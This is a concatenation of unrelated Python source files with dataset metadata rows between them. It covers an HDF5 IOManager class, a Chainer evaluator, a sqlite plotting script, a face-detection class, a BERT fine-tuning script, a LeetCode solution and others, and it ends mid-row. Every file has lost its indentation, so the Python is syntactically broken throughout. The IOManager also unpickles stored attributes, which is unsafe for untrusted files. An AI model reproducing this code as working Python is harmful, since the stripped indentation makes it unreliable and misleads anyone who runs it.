@copyright: Copyright (C) 2010, 2011, 2012, 2016 R. Bourquin
@license: Modified BSD License
"""
import os
import types
import pickle
import json
import six
import h5py as hdf
import numpy as np
__all__ = ["IOManager"]
class IOManager(object):
"""An IOManager class that can save various simulation results into data
files. For storing the data we use the well established HDF5 file format.
An IOManager instance abstracts the input and output operations and translates
requests into low-level operations.
"""
def __init__(self):
self._hdf_file_version = 2
self._prefixb = "datablock_"
self._prefixg = "group_"
# The current open data file
self._srf = None
# Book keeping data
# TODO: consider storing these values inside the data files
self._block_ids = None
self._block_count = None
self._group_ids = None
self._group_count = None
def __str__(self):
if self._srf is None:
s = "IOManager instance without an open file."
else:
s = "IOManager instance with open file " + str(self._srf.filename) + "\n"
s += " containing " + str(self._block_count) + " data blocks in "
s += str(self._group_count) + " data groups."
return s
def __getattr__(self, key):
"""Try to load a plugin if a member function is not available.
Plugins implement the actual I/O operations for specific data objects.
"""
parts = key.split("_")
# Plugin name convention, we only trigger plugin loading
# for requests starting with "add", "load" or "save".
# However, IF we load a plugin, we load ALL functions it defines.
if parts[0] not in ("add", "delete", "has", "load", "save", "update"):
return
else:
print("Requested function: {}".format(key))
name = "IOM_plugin_" + parts[1]
# Load the necessary plugin
print("Plugin to load: {}".format(name))
try:
plugin = __import__(name)
except ImportError:
raise ImportError("IOM plugin '{}' not found!".format(name))
# Filter out functions we want to add to IOM and
# bind the methods to the current IOM instance
for k, v in plugin.__dict__.items():
if isinstance(v, types.FunctionType):
self.__dict__[k] = types.MethodType(v, self)
# Now return the new function to complete it's call
return self.__dict__[key]
def create_file(self, filename):
"""Set up a new :py:class:`IOManager` instance. The output file is created and opened.
:param filename: The filename (optionally with filepath) of the file we try to create.
If not given the default value from `GlobalDefaults` is used.
"""
# Create the file if it does not yet exist.
# Otherwise raise an exception to avoid overwriting data.
if os.path.lexists(filename):
raise IOError("Output file '{}' already exists!".format(filename))
else:
self._srf = hdf.File(filename)
# Initialize the internal book keeping data
self._block_ids = []
self._block_count = 0
self._group_ids = []
self._group_count = 0
# The version of the current file format
self._srf.attrs["file_version"] = self._hdf_file_version
# Save the simulation parameters
self.create_group(groupid="global")
self.create_block(blockid="global", groupid="global")
def open_file(self, filename):
"""Load a given file that contains the results from another simulation.
:param filename: The filename (optionally with filepath) of the file we try to load.
If not given the default value from `GlobalDefaults` is used.
"""
# Try to open the file or raise an exception if it does not exist.
if os.path.lexists(filename):
if hdf.is_hdf5(filename):
self._srf = hdf.File(filename)
else:
raise IOError("File '{}' is not a hdf5 file".format(filename))
else:
raise IOError("File '{}' does not exist!".format(filename))
# Check if the file format can be read by the IOManager
if "file_version" not in self._srf.attrs.keys():
print("Warning: Unsupported file format without version number")
else:
if self._srf.attrs["file_version"] != self._hdf_file_version:
raise IOError("Unsupported file format version " + str(self._srf.attrs["file_version"]))
# Initialize the internal book keeping data
self._block_ids = [s[len(self._prefixb):] for s in self._srf.keys() if s.startswith(self._prefixb)]
self._block_count = len(self._block_ids)
self._group_ids = [s[len(self._prefixg):] for s in self._srf.keys() if s.startswith(self._prefixg)]
self._group_count = len(self._group_ids)
def finalize(self):
"""Close the open output file and reset the internal information."""
if self._srf is None:
return
# Close the file
self._srf.flush()
self._srf.close()
self._srf = None
# Reset book keeping data
self._block_ids = None
self._block_count = None
self._group_ids = None
self._group_count = None
def get_number_blocks(self, groupid=None):
"""Return the number of data blocks in the current file structure.
:param groupid: An optional group ID. If given we count only data blocks which are a
member of this group. If it is ``None`` (default) we count all data blocks.
"""
if groupid is None:
return self._block_count
else:
return len(self.get_block_ids(groupid=groupid))
def get_number_groups(self):
"""Return the number of data block groups in the current file structure.
"""
return self._group_count
def get_block_ids(self, groupid=None, grouped=False):
"""Return a list containing the IDs for all blocks in the current file structure.
:param groupid: An optional group ID. If given we return only block IDs for blocks
which are a member of this group. If it is ``None`` we return all block IDs.
:param grouped: If ``True`` we group the block IDs by their group into lists.
This option is only relevant in case the `groupid` is not given.
"""
if groupid is not None:
if str(groupid) in self._group_ids:
return self._srf["/" + self._prefixg + str(groupid)].keys()
else:
return []
else:
if grouped is False:
return self._block_ids[:]
else:
return [self._srf["/" + self._prefixg + str(gid)].keys() for gid in self.get_group_ids()]
def get_group_ids(self, exclude=[]):
"""Return a list containing the IDs for all groups in the current file structure.
:param exclude: A list of group IDs to exclude. Per default no group is excluded.
"""
return [gid for gid in self._group_ids if gid not in exclude]
def get_group_of_block(self, blockid):
"""Return the ID of the group a given block belongs to or ``None``
if there is no such data block.
:param blockid: The ID of the given block.
"""
if str(blockid) in self._block_ids:
return self._srf["/" + self._prefixb + str(blockid)].attrs["group"]
else:
return None
def create_block(self, *, blockid=None, groupid="global", **blockattributes):
"""Create a data block with the specified block ID. Each data block can
store several chunks of information, and there can be an arbitrary number
of data blocks per file.
:param blockid: The ID for the new data block. If not given the blockid will
be choosen automatically. The block ID has to be unique.
:return: The block ID of the created block.
"""
if self._srf is None:
return
if blockid is not None and (not str(blockid).isalnum()):
raise ValueError("Block ID allows only characters A-Z, a-z and 0-9 and no leading digit.")
if blockid is not None and str(blockid) in self._block_ids:
raise ValueError("Invalid or already used block ID: " + str(blockid))
if blockid is None:
# Try to find a valid autonumber
autonumber = 0
while str(autonumber) in self._block_ids:
autonumber += 1
blockid = str(autonumber)
self._block_ids.append(str(blockid))
self._block_count += 1
# Create the data block
datablock = self._srf.create_group("/" + self._prefixb + str(blockid))
# Does the group already exist?
if not str(groupid) in self._group_ids:
self.create_group(groupid=groupid)
# Put the data block into the group
datablock.attrs["group"] = str(groupid)
self._srf["/" + self._prefixg + str(groupid) + "/" + str(blockid)] = hdf.SoftLink("/" + self._prefixb + str(blockid))
# Write some extended attributes
for attribute, value in blockattributes.items():
datablock.attrs['ext:' + attribute] = str(value)
return blockid
def create_group(self, groupid=None):
"""Create a data group with the specified group ID. Each data group can
contain an arbitrary number of data blocks, and there can be an arbitrary
number of data groups per file.
:param groupid: The ID for the new data group. If not given the group ID will
be chosen automatically. The group ID has to be unique.
:return: The group ID of the created group.
"""
if self._srf is None:
return
if groupid is not None and (not str(groupid).isalnum()):
raise ValueError("Group ID allows only characters A-Z, a-z and 0-9 and no leading digit.")
if groupid is not None and str(groupid) in self._group_ids:
raise ValueError("Invalid or already used group ID: " + str(groupid))
if groupid is None:
# Try to find a valid autonumber
autonumber = 0
while str(autonumber) in self._group_ids:
autonumber += 1
groupid = str(autonumber)
self._group_ids.append(str(groupid))
self._group_count += 1
# Create the group
self._srf.create_group("/" + self._prefixg + str(groupid))
return groupid
def must_resize(self, path, size, axis=0):
"""Check if we must resize a given dataset and if yes, resize it.
"""
# Ok, it's inefficient but sufficient for now.
# TODO: Consider resizing in bigger chunks and shrinking at the end if necessary.
# Current size of the array
cur_len = self._srf[path].shape[axis]
# Is the current size smaller than the new "size"?
# If yes, then resize the array along the given axis.
if cur_len - 1 < size:
self._srf[path].resize(size + 1, axis=axis)
def find_timestep_index(self, timegridpath, timestep):
"""Lookup the index for a given timestep. This assumes the timegrid
array is strictly monotone.
"""
# TODO: Allow for slicing etc
timegrid = self._srf[timegridpath][:]
index = (timegrid == timestep)
nrvals = np.sum(index)
if nrvals < 1:
raise ValueError("No index for given timestep!")
elif nrvals > 1:
raise ValueError("Multiple indices for given timestep!")
else:
return int(np.where(index)[0])
def split_data(self, data, axis):
"""Split a multi-dimensional data block into slabs along a given axis.
:param data: The data tensor given.
:param axis: The axis along which to split the data.
:return: A list of slices.
"""
parts = data.shape[axis]
return np.split(data, parts, axis=axis)
def _save_attr_value(self, value):
# TODO: Fix for old python 2.x
# Remove after 3.x transition
# Store all the values as pickled strings because hdf can
# only store strings or ndarrays as attributes.
bpv = pickle.dumps(value)
if not isinstance(bpv, bytes):
bpv = six.b(bpv)
npvbpv = np.void(bpv)
return npvbpv
def _load_attr_value(self, value):
# TODO: Fix for old python 2.x
# Remove after 3.x transition
npvbpv = value
bpv = value.tobytes(npvbpv)
pv = pickle.loads(bpv)
return pv
| 36.64986 | 125 | 0.608759 | 12,755 | 0.974855 | 0 | 0 | 0 | 0 | 0 | 0 | 6,154 | 0.470345 |
445e24e9f950050d099133d81a9287a8a72037c0 | 1,738 | py | Python | models/evaluater.py | pfnet-research/step-wise-chemical-synthesis-prediction | a24a88f648d353c2833827715068c90615899ed4 | [
"MIT"
] | 13 | 2019-10-01T08:35:47.000Z | 2022-02-07T03:24:05.000Z | models/evaluater.py | pfnet-research/step-wise-chemical-synthesis-prediction | a24a88f648d353c2833827715068c90615899ed4 | [
"MIT"
] | null | null | null | models/evaluater.py | pfnet-research/step-wise-chemical-synthesis-prediction | a24a88f648d353c2833827715068c90615899ed4 | [
"MIT"
] | 2 | 2021-08-12T05:14:45.000Z | 2021-11-30T07:29:31.000Z | import chainer
from chainer import functions, reporter
import cupy as cp
class FrameworEvaluater(chainer.Chain):
'''
evaluator for each separate part
'''
def __init__(self, g_stop, g_atom, g_pair, g_action):
self.g_stop = g_stop
self.g_atom = g_atom
self.g_pair = g_pair
self.g_action = g_action
super(FrameworEvaluater, self).__init__()
def __call__(self, f_atoms, f_bonds, super_node_x,
atom_label, mask_reagents, mask_reactants_reagents, pair_label, mask_pair_select,
action, step_num,
stop_idx,
sample_index):
atom_label -= 1
mask_reagents -= 2
mask_reactants_reagents -= 2
action -= 1
batch_size = action.shape[0]
# atom
loss_atom, acc_atom, atoms_selected = self.g_atom(f_atoms, cp.copy(f_bonds), super_node_x, atom_label, mask_reagents, mask_reactants_reagents, batch_size)
# pair
loss_pair = self.g_pair(f_atoms, cp.copy(f_bonds), super_node_x, action, pair_label, mask_pair_select, batch_size, atoms_selected)
# action
loss_action, acc_action = self.g_action(f_atoms, cp.copy(f_bonds), super_node_x, action, batch_size)
# stop
loss_stop, acc_stop = self.g_stop(f_atoms, cp.copy(f_bonds), super_node_x, stop_idx, action, batch_size)
reporter.report({
'loss_stop': loss_stop,
'loss_atom': loss_atom,
'loss_pair': loss_pair,
'loss_action': loss_action,
'acc_stop': acc_stop,
'acc_atom': acc_atom,
# 'acc_pair': acc_pair, # acc_pair need to be further extended
'acc_action': acc_action,
}, self)
| 32.792453 | 162 | 0.634062 | 1,662 | 0.956272 | 0 | 0 | 0 | 0 | 0 | 0 | 220 | 0.126582 |
445e689615f50b3103fabda264a4d3bf138fe65a | 1,968 | py | Python | Scripts/domain-db-all-domain-rates.py | colinwalshbrown/CWB_utils | 86675812f9398845d1994b57500830e2c3dc6cc0 | [
"MIT"
] | null | null | null | Scripts/domain-db-all-domain-rates.py | colinwalshbrown/CWB_utils | 86675812f9398845d1994b57500830e2c3dc6cc0 | [
"MIT"
] | null | null | null | Scripts/domain-db-all-domain-rates.py | colinwalshbrown/CWB_utils | 86675812f9398845d1994b57500830e2c3dc6cc0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import sys
import sqlite3
import matplotlib.pyplot as plt
import numpy as np
def main(args):
if len(args) < 2:
print "usage: domain-db-all-domain-rates.py <db> <species>"
sys.exit(1)
conn = sqlite3.connect(args[0])
conn.row_factory = sqlite3.Row
cur = conn.cursor()
sp1 = 'dmel'
sp2 = args[1]
domains = {}
cur.execute("""SELECT * FROM pfam_model""")
dom_list = cur.fetchall()
for x in dom_list:
d = {'desc':x['description'],
'length':x['length'],
'acc':x['accession'],
'pfam_id':x['pfam_id']}
domains[x['name']] = d
print "%s domains found" % len(domains.keys())
cnt = 0
for (k,d) in domains.items():
print "searching %s %s..." % (k,d['pfam_id'])
cur.execute("""SELECT r.rate
FROM domain_pw_aa_rates r JOIN dmel_pfam_domain d
ON r.dmel_pfam_domain_id = d.dmel_pfam_domain_id
WHERE ((d.pfam_id = ?) AND (r.species1 = ?)) AND (r.species2 = ?)""", (str(d['pfam_id']),sp1,sp2))
rates_result = cur.fetchall()
print len(rates_result)
rates = np.array([float(x['rate']) for x in rates_result])
med = np.median(rates)
d['med'] = med
print "%d %s: %s median = %s" % (cnt,k,'dmel_' + sp2,med)
cnt += 1
median_rates = np.array([x['med'] for x in domains.values() if x['med'] >= 0])
print median_rates
plt.figure(1,figsize=(7,7))
plt.hist(median_rates,bins=50)
plt.xlabel("Per-family Median Pairwise %s-%s AA rate" % (sp1,sp2))
plt.ylabel("Family Count")
plt.show()
plt.savefig("%s_all-domain-median-rates.svg" % (args[0],),format="svg")
rout = open("%s-%s_domains_median-rates.txt" % (sp1,sp2),"w")
print >> rout, "\t".join([str(x) for x in median_rates])
if __name__ == "__main__":
main(sys.argv[1:])
| 31.741935 | 121 | 0.552337 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 690 | 0.35061 |
445f77fe93f324f67e10e55b0a43977d0e9569e3 | 292 | py | Python | spider/conf.py | schoeu/spid | eebb21fd41799cb077938593b4ff352b51322bc4 | [
"MIT"
] | 1 | 2018-10-18T06:59:34.000Z | 2018-10-18T06:59:34.000Z | spider/conf.py | schoeu/spid | eebb21fd41799cb077938593b4ff352b51322bc4 | [
"MIT"
] | 8 | 2021-03-18T21:11:03.000Z | 2022-03-11T23:30:58.000Z | spider/conf.py | schoeu/spid | eebb21fd41799cb077938593b4ff352b51322bc4 | [
"MIT"
] | null | null | null | import utils
import os
import json
def getjsondata(path):
if not os.path.isabs(path):
path = os.path.join(os.path.dirname(os.path.realpath(__file__)), path)
f = open(path)
data = json.loads(f.read())
return data
def getconfig():
return getjsondata('./conf.json') | 22.461538 | 78 | 0.664384 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 | 0.044521 |
4460778f6a8c643ae09c2cfcff03efe7a38ed115 | 2,080 | py | Python | rocketbear/orderings.py | wallarelvo/rocketbear | 905c24e4243f178a50907ae965de68dc119de25d | [
"Apache-2.0"
] | 1 | 2015-04-13T09:59:21.000Z | 2015-04-13T09:59:21.000Z | rocketbear/orderings.py | wallarelvo/rocketbear | 905c24e4243f178a50907ae965de68dc119de25d | [
"Apache-2.0"
] | null | null | null | rocketbear/orderings.py | wallarelvo/rocketbear | 905c24e4243f178a50907ae965de68dc119de25d | [
"Apache-2.0"
] | null | null | null |
import graph
"""
This file contains multiple heuristics that can be used for static and
dynamic variable orderings
"""
class DynamicDomOverDeg(graph.ConstraintGraph):
"""
Dynamic ordering using the pruned domain over the degree
"""
def ordering(self, v):
"""
Returns the evaluation used for ordering for a node
"""
return len(v.get_pruned_domain()) / len(self.edges[v])
class DynamicSmallestDomainFirst(graph.ConstraintGraph):
"""
Dynamic ordering where the variable with the currently smallest
pruned domain is expanded frist
"""
def ordering(self, v):
"""
Returns the evaluation used for ordering for a node
"""
return len(v.get_pruned_domain())
class StaticSmallestDomainFirst(graph.ConstraintGraph):
"""
Static ordering where the variable with the overall smallest
domain is expanded first
"""
def ordering(self, v):
"""
Returns the evaluation used for ordering for a node
"""
return len(v.get_full_domain())
class StaticMostArcsFirst(graph.ConstraintGraph):
"""
Static ordering where the variable with the overall largest number
of constraints is expanded first
"""
def ordering(self, v):
"""
Returns the evaluation used for ordering for a node
"""
return -len(self.edges[v])
class DynamicMostArcsFirst(graph.ConstraintGraph):
"""
Dynamic ordering where the variable with the highest number of constraints
to variables that are not already assigned is expanded first
"""
def ordering(self, v):
"""
Returns the evaluation used for ordering for a node
"""
s = 0
for nbr in self.edges[v]:
if not nbr.is_assigned():
s -= 1
return s
# Used for higher order functionality
orders = {
"dsdf": DynamicSmallestDomainFirst,
"ssdf": StaticSmallestDomainFirst,
"smaf": StaticMostArcsFirst,
"dmaf": DynamicMostArcsFirst,
"ddod": DynamicDomOverDeg
}
| 24.186047 | 78 | 0.647596 | 1,714 | 0.824038 | 0 | 0 | 0 | 0 | 0 | 0 | 1,114 | 0.535577 |
4460cfce11c83223a372c1c7e7325d7b8a9b4bfa | 617 | py | Python | src/covid_health/transcoding/names/owid.py | ggbaro/covid-health-ita | 267801c3de021078a1ca5d3b93b47515315f0300 | [
"MIT"
] | 3 | 2020-03-25T22:20:07.000Z | 2020-03-29T10:01:24.000Z | src/covid_health/transcoding/names/owid.py | ggbaro/covid-health-ita | 267801c3de021078a1ca5d3b93b47515315f0300 | [
"MIT"
] | null | null | null | src/covid_health/transcoding/names/owid.py | ggbaro/covid-health-ita | 267801c3de021078a1ca5d3b93b47515315f0300 | [
"MIT"
] | null | null | null | col = {
"owid": {
"Notes": "notes",
"Entity": "entity",
"Date": "time",
"Source URL": "src",
"Source label": "src_lb",
"Cumulative total": "tot_n_tests",
"Daily change in cumulative total": "n_tests",
"Cumulative total per thousand": "tot_n_tests_pthab",
"Daily change in cumulative total per thousand": "n_tests_pthab",
"General source label": "source",
"General source URL": "source_url",
"Short description": "source_desc",
"Detailed description": "source_desc_detailed",
}
}
var = {
"owid": {}
}
| 28.045455 | 73 | 0.559157 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 417 | 0.675851 |
4460d19513e88f49fee31e54b8a44dfa4a3f968c | 2,221 | py | Python | models/sentry.py | m1ojk/nicedoor | d9d6a1b56ac8ba642b726aa8fe9db1f1f8a209c7 | [
"MIT"
] | null | null | null | models/sentry.py | m1ojk/nicedoor | d9d6a1b56ac8ba642b726aa8fe9db1f1f8a209c7 | [
"MIT"
] | null | null | null | models/sentry.py | m1ojk/nicedoor | d9d6a1b56ac8ba642b726aa8fe9db1f1f8a209c7 | [
"MIT"
] | null | null | null | import cv2
import time
import logging
class Sentry:
#__face_cascade = cv2.CascadeClassifier('haarcascades/haarcascade_frontalface_default.xml')
__face_cascade = cv2.CascadeClassifier('haarcascades/haarcascade_frontalface_alt.xml')
#__face_cascade = cv2.CascadeClassifier('haarcascades/haarcascade_upperbody.xml')
__eye_cascade = cv2.CascadeClassifier('haarcascades/haarcascade_eye.xml')
__ALERT_INTERVAL = 5
def __init__(self):
self.face_count = 0
self.image = None#cv2.imread('notfound.jpg',0)
self.alert_reason = None
self.__alert_time = 0.0
self.__alert_face_count = 0
self.__faces = None
def is_alert(self, image, indicate=False):
is_detected = self.__is_face_detected(image, indicate)
should_alert = self.__should_alert()
#logging.debug("Detected: %r alert: %r"%(is_detected, should_alert))
return is_detected and should_alert
def __is_face_detected(self, image, indicate):
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
faces = self.__face_cascade.detectMultiScale(gray, 1.2, 2)
self.face_count = len(faces)
self.image = image
if self.face_count > 0:
self.__faces = faces
if indicate:
for (x,y,w,h) in self.__faces:
self.image = cv2.rectangle(self.image,(x,y),(x+w,y+h),(200,10,10),2)
return self.face_count > 0
# Alert Requirements
# - No alert - when no faces were detected currently and previously
# - alert - first time face_count is different than previous
# - - If face_count is same as before and not 0, then alert every 5 seconds
def __should_alert(self):
if self.face_count == 0 and self.__alert_face_count == 0: return False
if self.face_count != self.__alert_face_count :
self.alert_reason = "Face count was %s but is now %s"%(self.__alert_face_count, self.face_count)
self.__alert_face_count = self.face_count
self.__alert_time = time.perf_counter()
return True
duration = int(time.perf_counter() - self.__alert_time)
if duration > self.__ALERT_INTERVAL:
self.alert_reason = "Duration is greater than %s"%self.__ALERT_INTERVAL
self.__alert_time = time.perf_counter()
return duration > self.__ALERT_INTERVAL
| 35.822581 | 102 | 0.719496 | 2,179 | 0.98109 | 0 | 0 | 0 | 0 | 0 | 0 | 640 | 0.288158 |
44612610a1b1f0eb6980ce4691cd9e86d9bc0301 | 5,753 | py | Python | train.py | ajitrajasekharan/huggingface_finetune_wrapper | 772aee569fd8ed225f340a167fd7137dc49be895 | [
"MIT"
] | 1 | 2021-06-13T05:38:54.000Z | 2021-06-13T05:38:54.000Z | train.py | ajitrajasekharan/huggingface_finetune_wrapper | 772aee569fd8ed225f340a167fd7137dc49be895 | [
"MIT"
] | null | null | null | train.py | ajitrajasekharan/huggingface_finetune_wrapper | 772aee569fd8ed225f340a167fd7137dc49be895 | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score, recall_score, precision_score, f1_score
import torch
from transformers import TrainingArguments, Trainer
from transformers import BertTokenizer, BertForSequenceClassification
from transformers import EarlyStoppingCallback
import pdb
import argparse
import traceback
import sys
DEFAULT_MODEL_PATH="./model"
DEFAULT_OUTPUT_DIR="./output"
DEFAULT_SEQUENCE_LENGTH=512
class Dataset(torch.utils.data.Dataset):
def __init__(self, encodings, labels=None):
self.encodings = encodings
self.labels = labels
def __getitem__(self, idx):
item = {key: torch.tensor(val[idx]) for key, val in self.encodings.items()}
if self.labels:
item["labels"] = torch.tensor(self.labels[idx])
return item
def __len__(self):
return len(self.encodings["input_ids"])
# Define Trainer parameters
def compute_metrics(p):
pred, labels = p
pred = np.argmax(pred, axis=1)
accuracy = accuracy_score(y_true=labels, y_pred=pred)
recall = recall_score(y_true=labels, y_pred=pred)
precision = precision_score(y_true=labels, y_pred=pred)
f1 = f1_score(y_true=labels, y_pred=pred)
return {"accuracy": accuracy, "precision": precision, "recall": recall, "f1": f1}
def fine_tune(params):
input_file = params.input
model_name_or_path = params.model
output_dir = params.output
paired = params.paired
seq_length = params.seq_length
# Read data
#data = pd.read_csv("data/tokenized_train.csv",sep='\t')
data = pd.read_csv(input_file,sep='\t')
# Define pretrained tokenizer and model
#model_name = "bert-large-cased"
model_name = model_name_or_path
tokenizer = BertTokenizer.from_pretrained(model_name)
model = BertForSequenceClassification.from_pretrained(model_name, num_labels=2)
device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
model.to(device)
# ----- 1. Preprocess data -----#
# Preprocess data
if (paired):
X1 = list(data["text1"])
X2 = list(data["text2"])
assert(len(X1) == len(X2))
X = []
for i in range(len(X1)):
X.append(X1[i] + '\t' + X2[i])
else:
X = list(data["text"])
y = list(data["label"])
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.01)
if (paired):
X1 = []
X2 = []
for i in range(len(X_train)):
arr = X_train[i].split('\t')
assert(len(arr) == 2)
X1.append(arr[0])
X2.append(arr[1])
#pdb.set_trace()
X_train_tokenized = tokenizer(text=X1, text_pair = X2, padding=True, truncation=True, max_length=seq_length)
else:
X_train_tokenized = tokenizer(X_train, padding=True, truncation=True, max_length=seq_length)
if (paired):
X1 = []
X2 = []
for i in range(len(X_val)):
arr = X_val[i].split('\t')
assert(len(arr) == 2)
X1.append(arr[0])
X2.append(arr[1])
X_val_tokenized = tokenizer(text = X1, text_pair = X2, padding=True, truncation=True, max_length=seq_length)
else:
X_val_tokenized = tokenizer(X_val, padding=True, truncation=True, max_length=seq_length)
# Create torch dataset
train_dataset = Dataset(X_train_tokenized, y_train)
val_dataset = Dataset(X_val_tokenized, y_val)
# ----- 2. Fine-tune pretrained model -----#
# Define Trainer
args = TrainingArguments(
output_dir=output_dir,
evaluation_strategy="steps",
eval_steps=100,
save_steps=100,
warmup_steps=500,
per_device_train_batch_size=32,
per_device_eval_batch_size=32,
#learning_rate = 1e-5,
num_train_epochs=5,
#weight_decay=0.01,
seed=0,
load_best_model_at_end=True,
logging_dir='./logs', # directory for storing logs
logging_steps=10,
metric_for_best_model="accuracy"
)
trainer = Trainer(
model=model,
args=args,
train_dataset=train_dataset,
eval_dataset=val_dataset,
compute_metrics=compute_metrics,
#callbacks=[EarlyStoppingCallback(early_stopping_patience=3)],
)
# Train pre-trained model
trainer.train()
trainer.save_model(output_dir)
print("Model saved. Training complete")
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Fine tune model ',formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-model', action="store", dest="model", default=DEFAULT_MODEL_PATH,help='BERT pretrained models, or custom model path')
parser.add_argument('-input', action="store", dest="input",required=True, help='Input train data file')
parser.add_argument('-output', action="store", dest="output",default=DEFAULT_OUTPUT_DIR, help='Output directory where model is saved')
parser.add_argument('-seq_length', action="store", dest="seq_length",type=int,default=DEFAULT_SEQUENCE_LENGTH, help='Default max sequence length of input')
parser.add_argument('-paired', dest="paired", action='store_true',help='Input is expected to be **pairs** of sentences')
parser.add_argument('-no-paired', dest="paired", action='store_false',help='Input is expected to be **single** sentence - not pairs of sentences')
parser.set_defaults(paired=False)
results = parser.parse_args()
try:
torch.cuda.empty_cache()
fine_tune(results)
except:
print("Unexpected error:", sys.exc_info()[0])
traceback.print_exc(file=sys.stdout)
| 34.656627 | 159 | 0.664523 | 445 | 0.077351 | 0 | 0 | 0 | 0 | 0 | 0 | 1,124 | 0.195376 |
44619703bad870796ed0246c1284937d5fd67724 | 681 | py | Python | examples/caseless_example.py | kajuberdut/incase | 48b281ac49e22d0b76510771bfa9de9ed94d1fc4 | [
"MIT"
] | null | null | null | examples/caseless_example.py | kajuberdut/incase | 48b281ac49e22d0b76510771bfa9de9ed94d1fc4 | [
"MIT"
] | null | null | null | examples/caseless_example.py | kajuberdut/incase | 48b281ac49e22d0b76510771bfa9de9ed94d1fc4 | [
"MIT"
] | null | null | null | from incase import Case, Caseless
# Instances of Caseless are strings
example = Caseless("example string")
print(isinstance(example, str))
# True
# By property
print(example.snake)
# example_string
# Or by subscript (string or Case)
print(example["camel"])
# exampleString
print(example[Case.UPPER_SNAKE])
# EXAMPLE_STRING
# Caseless ignore case when comparing to str
print(Caseless("some name") == "SOME_NAME")
# True
# Caseless hashes ignore case also
a_dict = {Caseless("This is a Key"): "this"}
print(a_dict[Caseless("thisIsAKey")])
# Caseless can also generate case coercion functions
make_camel = Caseless.factory("camel")
print(make_camel("snake_case"))
# snakeCase
| 21.28125 | 52 | 0.754772 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 379 | 0.556535 |
4461eff877eb304b062070484689204017151234 | 150 | py | Python | A/A 1030 In Search of an Easy Problem.py | zielman/Codeforces-solutions | 636f11a9eb10939d09d2e50ddc5ec53327d0b7ab | [
"MIT"
] | null | null | null | A/A 1030 In Search of an Easy Problem.py | zielman/Codeforces-solutions | 636f11a9eb10939d09d2e50ddc5ec53327d0b7ab | [
"MIT"
] | 1 | 2021-05-05T17:05:03.000Z | 2021-05-05T17:05:03.000Z | A/A 1030 In Search of an Easy Problem.py | zielman/Codeforces-solutions | 636f11a9eb10939d09d2e50ddc5ec53327d0b7ab | [
"MIT"
] | null | null | null | # https://codeforces.com/problemset/problem/1030/A
n = int(input())
o = list(map(int, input().split()))
print('HARD' if o.count(1) != 0 else 'EASY') | 25 | 50 | 0.646667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 62 | 0.413333 |
446236fdcdb79bd05ce93e13267607c7ab6079e6 | 752 | py | Python | leetcode/039-Combination-Sum/CombinationSum_001.py | cc13ny/all-in | bc0b01e44e121ea68724da16f25f7e24386c53de | [
"MIT"
] | 1 | 2017-05-18T06:11:02.000Z | 2017-05-18T06:11:02.000Z | leetcode/039-Combination-Sum/CombinationSum_001.py | cc13ny/all-in | bc0b01e44e121ea68724da16f25f7e24386c53de | [
"MIT"
] | 1 | 2016-02-09T06:00:07.000Z | 2016-02-09T07:20:13.000Z | leetcode/039-Combination-Sum/CombinationSum_001.py | cc13ny/all-in | bc0b01e44e121ea68724da16f25f7e24386c53de | [
"MIT"
] | 2 | 2019-06-27T09:07:26.000Z | 2019-07-01T04:40:13.000Z | class Solution:
# @param {integer[]} candidates
# @param {integer} target
# @return {integer[][]}
def combinationSum(self, candidates, target):
candidates.sort()
return self.combsum(candidates, target)
def combsum(self, nums, target):
if target == 0:
return [[]]
if not nums or nums[0] > target or target < 1:
return []
res = []
for i in range(len(nums)):
num = nums[i]
pre = [num]
t = target
while t >= num:
t -= num
subs = self.combsum(nums[i + 1:], t)
for sub in subs:
res.append(pre + sub)
pre += [num]
return res
| 27.851852 | 54 | 0.458777 | 751 | 0.99867 | 0 | 0 | 0 | 0 | 0 | 0 | 79 | 0.105053 |
44631cbd82bde4053d51f4b0bd82dc77e1e5e801 | 1,290 | py | Python | diplomacy_research/models/gym/__init__.py | wwongkamjan/dipnet_press | 787263c1b9484698904f525c8d78d0e333e1c0d9 | [
"MIT"
] | 39 | 2019-09-06T13:42:24.000Z | 2022-03-18T18:38:43.000Z | diplomacy_research/models/gym/__init__.py | wwongkamjan/dipnet_press | 787263c1b9484698904f525c8d78d0e333e1c0d9 | [
"MIT"
] | 9 | 2019-09-19T22:35:32.000Z | 2022-02-24T18:04:57.000Z | diplomacy_research/models/gym/__init__.py | wwongkamjan/dipnet_press | 787263c1b9484698904f525c8d78d0e333e1c0d9 | [
"MIT"
] | 8 | 2019-10-16T21:09:14.000Z | 2022-02-23T05:20:37.000Z | # ==============================================================================
# Copyright 2019 - Philip Paquette
#
# NOTICE: Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# ==============================================================================
""" OpenAI Gym integration modules """
import warnings
from gym.envs.registration import register
from diplomacy_research.models.gym.wrappers import AutoDraw, LimitNumberYears, LoopDetection, SetInitialState, \
AssignPlayers, RandomizePlayers, SetPlayerSeed, SaveGame
# Ignore specific warnings
warnings.filterwarnings('ignore', message='Parameters to load are deprecated')
register(
id='DiplomacyEnv-v0',
entry_point='diplomacy_research.models.gym.environment:DiplomacyEnv')
| 49.615385 | 112 | 0.684496 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 967 | 0.749612 |
44635bbeca29eba01a7b5eccef6188241ac9a808 | 4,271 | py | Python | kik_unofficial/datatypes/xmpp/history.py | TriSerpent/kik-bot-api-unofficial | 9ae9dea8a4936ba628c9ac7a749aa8d6b3e94487 | [
"MIT"
